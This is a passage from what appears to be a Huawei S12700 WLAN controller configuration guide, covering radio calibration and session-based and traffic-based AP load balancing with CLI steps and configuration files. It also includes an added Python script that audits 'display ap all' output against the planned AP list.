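Checking this output by eye works for three APs; on a larger AC it is worth scripting the check so that an AP that is not in the plan, that is not in the normal state, or that landed in the wrong AP region is caught before the configuration is committed. The following Python script is an added example, not Huawei code or an AC feature: it parses the display ap all table reproduced above (embedded as a constructed test input) and compares it with the planned MAC addresses from Table 15-18. The region number 10 and the planned MAC list are taken from this example and are the only assumptions.

```python
"""Audit the AC's 'display ap all' output against the planned AP list.

Added example (not Huawei's code). The sample output below is a copy of the
table shown in this step; the planned MAC addresses come from Table 15-18.
"""
import re
from dataclasses import dataclass

# Output of "display ap all" as shown above (constructed test input).
SAMPLE_OUTPUT = """\
All AP information:
Normal[3],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP    AP              AP               Profile   AP        AP
                                       /Region
ID    Type            MAC              ID        State     Sysname
------------------------------------------------------------------------------
1     AP6010DN-AGN    60de-4476-e360   0/10      normal    ap-1
2     AP6010DN-AGN    dcd2-fc04-b500   0/10      normal    ap-2
3     AP6010DN-AGN    dcd2-fc96-e4c0   0/10      normal    ap-3
------------------------------------------------------------------------------
Total number: 3,printed: 3
"""

# Same output with a fourth, unplanned AP in the fault state (constructed).
UNPLANNED_OUTPUT = SAMPLE_OUTPUT.replace(
    "Normal[3],Fault[0]", "Normal[3],Fault[1]"
).replace(
    "Total number: 3,printed: 3",
    "4     AP6010DN-AGN    0000-aaaa-bbbb   0/10      fault     ap-4\n"
    "Total number: 4,printed: 4",
)

# Planned APs (MAC -> name) from the data planning table.
PLANNED_MACS = {
    "60de-4476-e360": "AP1",
    "dcd2-fc04-b500": "AP2",
    "dcd2-fc96-e4c0": "AP3",
}
MAC_RE = re.compile(r"^[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}$")


@dataclass
class ApEntry:
    ap_id: int
    ap_type: str
    mac: str
    profile_id: int
    region_id: int
    state: str
    sysname: str


def parse_state_summary(text):
    """Return the Normal[n],Fault[n],... counters as a dict."""
    return {m.group(1): int(m.group(2))
            for m in re.finditer(r"([A-Za-z-]+)\[(\d+)\]", text)}


def parse_display_ap_all(text):
    """Return one ApEntry per data row; header and separator lines are skipped."""
    entries = []
    for line in text.splitlines():
        f = line.split()
        # A data row has six fields: ID, type, MAC, profile/region, state, sysname.
        if len(f) != 6 or not f[0].isdigit() or not MAC_RE.match(f[2]):
            continue
        profile, region = f[3].split("/")
        entries.append(ApEntry(int(f[0]), f[1], f[2], int(profile),
                               int(region), f[4], f[5]))
    return entries


def audit_aps(text, planned=PLANNED_MACS, region=10):
    """Return a list of findings; an empty list means the AC matches the plan."""
    findings = []
    entries = parse_display_ap_all(text)
    counters = parse_state_summary(text)
    if sum(counters.values()) != len(entries):
        findings.append("state counters do not match the number of AP rows")
    seen = set()
    for e in entries:
        seen.add(e.mac)
        if e.mac not in planned:
            findings.append(f"AP {e.ap_id} ({e.mac}, {e.sysname}) is not in the plan")
        if e.state != "normal":
            findings.append(f"AP {e.ap_id} is in state {e.state}")
        if e.region_id != region:
            findings.append(f"AP {e.ap_id} is in region {e.region_id}, expected {region}")
    for mac, name in planned.items():
        if mac not in seen:
            findings.append(f"planned {name} ({mac}) has not joined the AC")
    return findings


if __name__ == "__main__":
    for name, text in (("planned", SAMPLE_OUTPUT), ("unplanned", UNPLANNED_OUTPUT)):
        print(name, audit_aps(text) or "OK")
```

The script compares the state counters in the summary line with the number of rows it parsed, so a truncated capture is reported rather than silently passing; feed it the real command output captured from the AC console to run it against a live deployment.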

Step 6 Configure WLAN service parameters.


# Create a WMM profile named wmm and retain the default settings in the profile.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
Set the channel mode and power mode to auto in the radio profile (default settings).
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.


[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit

# Create a security profile named security.


[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Set the encryption method to PSK+CCMP.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic and retain the default settings in the profile.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101
[AC-wlan-service-set-test] forward-mode tunnel
[AC-wlan-service-set-test] quit

Step 7 Configure VAPs and deliver VAP parameters to APs.


# Configure VAPs.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] radio-profile name radio
[AC-wlan-radio-1/0] service-set name test
[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name radio
[AC-wlan-radio-2/0] service-set name test
[AC-wlan-radio-2/0] quit
[AC-wlan-view] ap 3 radio 0
[AC-wlan-radio-3/0] radio-profile name radio
[AC-wlan-radio-3/0] service-set name test
[AC-wlan-radio-3/0] quit

Step 8 Configure radio calibration.


# Set the radio working mode to hybrid.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] work-mode hybrid
Warning: Modify the work mode may cause business interruption, continue?(y/n)[n]:y
[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] work-mode hybrid
Warning: Modify the work mode may cause business interruption, continue?(y/n)[n]:y
[AC-wlan-radio-2/0] quit
[AC-wlan-view] ap 3 radio 0
[AC-wlan-radio-3/0] work-mode hybrid
Warning: Modify the work mode may cause business interruption, continue?(y/n)[n]:y
[AC-wlan-radio-3/0] quit

# Set the radio calibration mode to schedule and configure the AC to start radio calibration at
03:00 every day.
[AC-wlan-view] calibrate enable schedule time 03:00:00

# Enable radio calibration in the radio profile view. By default, radio calibration is enabled in
the radio profile view.
# Commit the configuration.
[AC-wlan-view] commit ap 1
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
[AC-wlan-view] commit ap 3
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 9 Verify the configuration.


l After the preceding configurations are complete, the AC begins to adjust the channels
and power of the three APs to ensure that the APs work at optimal performance.
l STAs can connect to the WLAN with SSID test. Use AP1 as an example. Run the
display station assoc-info ap 1 command on the AC. The command output shows that the
STAs have associated with the WLAN test.
[AC-wlan-view] display station assoc-info ap 1
------------------------------------------------------------------------------
STA MAC          AP ID   RADIO ID   SS ID   SSID
------------------------------------------------------------------------------
14cf-9208-9abf   1       0          1       test
------------------------------------------------------------------------------
Total stations: 1

You can run the display statistics calibrate ap 1 radio 0 command on the AC to check the
radio calibration statistics of AP1.
[AC-wlan-view] display statistics calibrate ap 1 radio 0
-----------------------------------------------------------------------
Signal environment deterioration : 1
Power calibration                : 1
Channel calibration              : 0
-----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/4
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 101
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 101
#
interface Wlan-Ess1
port trunk allow-pass vlan 101
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 1 type-id 19 mac 60de-4476-e360 sn 210235419610CB002287
region-id 10
ap id 2 type-id 19 mac dcd2-fc04-b500 sn 210235555310CC000094
region-id 10
ap id 3 type-id 19 mac dcd2-fc96-e4c0 sn 210235582910D1000039
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
calibrate enable schedule time 03:00:00
radio-profile name radio id 1
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
work-mode hybrid
service-set id 1 wlan 1
ap 2 radio 0
radio-profile id 1
work-mode hybrid
service-set id 1 wlan 1
ap 3 radio 0
radio-profile id 1
work-mode hybrid
service-set id 1 wlan 1
#
return

15.8.2 Example for Configuring Session-based Static Load Balancing
Session-based Static Load Balancing Overview
Load balancing can evenly distribute AP traffic loads to ensure sufficient bandwidth for each
STA. In static load balancing, APs are manually added to a load balancing group. When a
STA wants to connect to an AP in the load balancing group, the AC determines whether to
allow the STA to connect to the AP according to a load balancing algorithm.
Static load balancing can be used in scenarios such as conference rooms. For example, if two
APs are deployed in a conference room, you can add the two APs to a load balancing group to
prevent heavy load on a single AP.

Configuration Notes
l In this example, the security policy is WPA2-PSK-CCMP. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In tunnel forwarding mode, the management VLAN and service VLAN cannot be the same.
If you set the forwarding mode to direct forwarding, you are advised not to configure
the management VLAN and service VLAN to be the same either.
l If direct forwarding is used, configure port isolation on the switch interfaces that
directly connect to APs. If port isolation is not configured, many broadcast packets are
transmitted in the VLANs, and WLAN users on different APs can communicate directly at
Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded only when the network between the AC and APs is added to
the management VLAN and the network between the AC and upper-layer network
is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l Each load balancing group supports a maximum of three APs.
l APs on which load balancing needs to be configured must be configured within the same
AP region.
l A load balancing group is a set of radios. A radio can join only one load balancing
group. If dual-band APs are used, traffic is load balanced among APs working on the
same frequency band. That is, a dual-band AP can join two load balancing groups.
l All APs in a load balancing group work on the same frequency band (2.4 GHz or 5
GHz). AP radios in a load balancing group must have different channels configured and
work on different channels.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 15-19 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN
V200R008C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN; V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-8, AP1 and AP2 connect to the AC through SwitchA and join AP
region 10.

When a large number of STAs access the Internet through the same AP, the AP is heavily
loaded, reducing WLAN service quality. The enterprise wants STAs to be balanced on the two
APs to prevent one AP from being heavily loaded.

Figure 15-8 Networking for configuring session-based static load balancing
(AP1 and AP2 connect to SwitchA interfaces GE0/0/1 and GE0/0/2 in VLAN 100; SwitchA GE0/0/3
connects to AC GE1/0/1 in VLAN 100; AC GE1/0/3 connects to the Internet in VLAN 101. STA1 to
STA4 associate with the two APs.)

Management VLAN: VLAN 100
Service VLAN: VLAN 101
AP region ID: 10

Data Planning

Table 15-20 Data required for completing the configuration

Item | Data | Description
IP address of the AC's source interface | 192.168.10.1/24 | None
WMM profile | Name: wmm | None
Radio profile | Name: radio | None
Security profile | Name: security; security and authentication policy: WPA2+PSK; authentication key: huawei123; encryption mode: CCMP | None
Traffic profile | Name: traffic | None
Service set | Name: test; SSID: test; WLAN virtual interface: WLAN-ESS 1; data forwarding mode: tunnel forwarding | None
DHCP server | The AC functions as the DHCP server to assign IP addresses to APs and STAs. | None
AP gateway and IP address range | VLANIF 100: 192.168.10.1/24; 192.168.10.2 to 192.168.10.254/24 | None
STA gateway and IP address range | VLANIF 101: 192.168.11.1/24; 192.168.11.2 to 192.168.11.254/24 | None
MAC addresses of APs | AP1: 60de-4476-e360; AP2: dcd2-fc04-b500 | None

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the WLAN service so that users can connect to the Internet through the
WLAN.
2. Configure session-based static load balancing to prevent new STAs from associating
with heavily-loaded APs.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA and add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management
VLAN 100.
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-GigabitEthernet0/0/3] port link-type trunk
[SwitchA-GigabitEthernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


# Add AC's uplink interface GE1/0/3 to VLAN 101.
[AC] vlan batch 101
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/3] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and APs.
# Configure a DHCP server to assign IP addresses to the APs from the IP address pool on
VLANIF 100 and assign IP addresses to STAs from the IP address pool on VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure AC system parameters.


# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the
AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 5 Manage APs on the AC.


# Check the AP type IDs after obtaining the MAC addresses of the APs.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------


17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting) and add
the APs offline by AP type ID. In this example AP1 and AP2 are AP6010DN-AGN (type ID 19)
with MAC addresses 60de-4476-e360 and dcd2-fc04-b500. Note that MAC authentication only
checks a source address that any device on VLAN 100 can spoof; where the AP serial numbers
are known in advance, SN authentication (ap-auth-mode sn-auth) gives the AC a stronger
check on which devices may join.
[AC-wlan-view] ap-auth-mode mac-auth
[AC-wlan-view] ap id 1 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit

# Configure an AP region and add the APs to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 10 //Add APs to region 10.
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 10
[AC-wlan-ap-2] quit

# After powering on AP1 and AP2, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[2],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP AP AP Profile AP AP
/Region
ID Type MAC ID State Sysname
------------------------------------------------------------------------------
1 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-1
2 AP6010DN-AGN dcd2-fc04-b500 0/10 normal ap-2
------------------------------------------------------------------------------
Total number: 2,printed: 2

Step 6 Configure WLAN service parameters.

# Create a WMM profile named wmm and retain the default settings in the profile.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
Set the channel mode to fixed.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode to fixed. The default value is auto.
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.


[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit

# Create a security profile named security. The pass-phrase huawei123 is only a placeholder
for this example: a WPA2-PSK pass-phrase can be recovered offline by dictionary attack from a
captured 4-way handshake, so use a long random pass-phrase (or 802.1X authentication) on a
production network.

[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Use PSK authentication with CCMP (AES) encryption.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic and retain the default settings in the profile.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Name the SSID test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service set to 101. The default value is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the service forwarding mode to tunnel forwarding.
[AC-wlan-service-set-test] quit

Step 7 Configure VAPs and deliver VAP parameters to APs.


# Configure VAPs.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] radio-profile name radio //Bind the radio profile to a radio.
[AC-wlan-radio-1/0] channel 20mhz 11 //Set the working channel of the radio to 11 and the channel bandwidth to 20 MHz.
[AC-wlan-radio-1/0] service-set name test //Bind the service set to the radio.
[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name radio
[AC-wlan-radio-2/0] channel 20mhz 6
[AC-wlan-radio-2/0] service-set name test
[AC-wlan-radio-2/0] quit

Step 8 Configure a load balancing group, add AP1 and AP2 to the load balancing group, and set the
load balancing mode of the group to session-based load balancing.
[AC-wlan-view] load-balance-group name huawei //Create load balancing group huawei.
[AC-wlan-load-group-huawei] member ap-id 1 radio-id 0 //Add AP1 radio 0 to load balancing group huawei.
[AC-wlan-load-group-huawei] member ap-id 2 radio-id 0
[AC-wlan-load-group-huawei] session gap 5 //Configure session-based static load balancing and set the load difference threshold to 5%. The default value is 4%.
[AC-wlan-load-group-huawei] associate-threshold 10 //Set the number of times a STA's association request may be rejected before the AC admits it to 10. The default value is 6.
[AC-wlan-load-group-huawei] quit
[AC-wlan-view] commit ap 1
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 9 Verify the configuration.

l After the preceding configuration is complete, STAs can discover the WLAN with SSID
test.
l When a new STA sends an association request to one of the two radios in load balancing
group huawei, the AC compares the load of that radio with the load of the least-loaded
member of the group. If the difference is larger than 5%, the AC rejects the association
request. If the STA continues sending association requests to that radio more than 10
times, the AC allows it to associate, so that a STA which can only reach the heavily
loaded AP is not locked out indefinitely.

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
 port link-type trunk
 port trunk allow-pass vlan 100
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 101
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
 ip address 192.168.10.1 255.255.255.0
 dhcp select interface
#
interface Vlanif101
 ip address 192.168.11.1 255.255.255.0
 dhcp select interface
#
interface GigabitEthernet1/0/1
 port link-type trunk
 port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
 port link-type trunk
 port trunk allow-pass vlan 101
#
interface Wlan-Ess1
 port trunk allow-pass vlan 101
#
wlan
 wlan ac source interface vlanif100
 ap-region id 10
 ap id 1 type-id 19 mac 60de-4476-e360 sn 210235419610CB002287
  region-id 10
 ap id 2 type-id 19 mac dcd2-fc04-b500 sn 210235555310CC000094
  region-id 10
 wmm-profile name wmm id 1
 traffic-profile name traffic id 1
 security-profile name security id 1
 service-set name test id 1
  forward-mode tunnel
  wlan-ess 1
  ssid test
  traffic-profile id 1
  security-profile id 1
  service-vlan 101
 radio-profile name radio id 1
  channel-mode fixed
  wmm-profile id 1
 ap 1 radio 0
  radio-profile id 1
  channel 20MHz 11
  service-set id 1 wlan 1
 ap 2 radio 0
  radio-profile id 1
  channel 20MHz 6
  service-set id 1 wlan 1
 load-balance-group name huawei id 0
  associate-threshold 10
  session gap 5
  member ap-id 1 radio-id 0
  member ap-id 2 radio-id 0
#
return

15.8.3 Example for Configuring Traffic-based Dynamic Load Balancing
Traffic-based Dynamic Load Balancing Overview
Load balancing can evenly distribute AP traffic loads to ensure sufficient bandwidth for each
STA. When a STA joins the network, the AC adds the APs that report the STA to a load
balancing group, and then uses a load balancing algorithm to determine whether to allow
access from the STA.
Dynamic load balancing applies to high-density wireless environments, such as stadiums and
stations.
Static load balancing supports a limited number of group members, and all members must be
manually added to the group and work on the same frequency band. Dynamic load balancing
overcomes these limitations and can better ensure bandwidth for each STA.


Configuration Notes
l In this example, the security policy is WPA2-PSK-CCMP. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In tunnel forwarding mode, the management VLAN and service VLAN cannot be the same.
If you set the forwarding mode to direct forwarding, you are also advised not to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly
connect to APs. If port isolation is not configured, many broadcast packets will be
transmitted in the VLANs, and WLAN users on different APs can communicate directly at
Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in the CAPWAP tunnel
and forwarded to the AC, which then forwards them to the upper-layer network or to
the APs. Service and management packets are therefore forwarded normally only when
the network between the AC and the APs carries the management VLAN and the network
between the AC and the upper-layer network carries the service VLAN.
– In direct forwarding mode, service packets are not encapsulated in the CAPWAP
tunnel but are forwarded directly to the upper-layer network or to the APs. Service
and management packets are therefore forwarded normally only when the network
between the AC and the APs carries the management VLAN and the network between the
APs and the upper-layer network carries the service VLAN.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l Radio traffic statistics are carried together with the CAPWAP Echo packets. Because
this example uses traffic-based dynamic load balancing, set the CAPWAP heartbeat
detection interval to 30s to 60s so that the radio traffic statistics are updated in a
timely manner.
l Multicast frames on the air interface are not acknowledged, and wireless links are
unstable, so multicast packets are usually sent at low rates to make their delivery
reliable. If the network side sends a large number of such packets, the air interface
may be congested. You are advised to configure multicast packet suppression to reduce
the impact of low-rate multicast traffic on the wireless network, but set the rate
limit carefully: an over-tight limit affects legitimate multicast services.
– In direct forwarding mode, configure multicast packet suppression on the switch
interfaces connected to APs.
– In tunnel forwarding mode, configure multicast packet suppression in the traffic
profiles on the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.


Table 15-21 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN
V200R008C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN; V200R005C30: AP2030DN, AP4030DN, AP4130DN
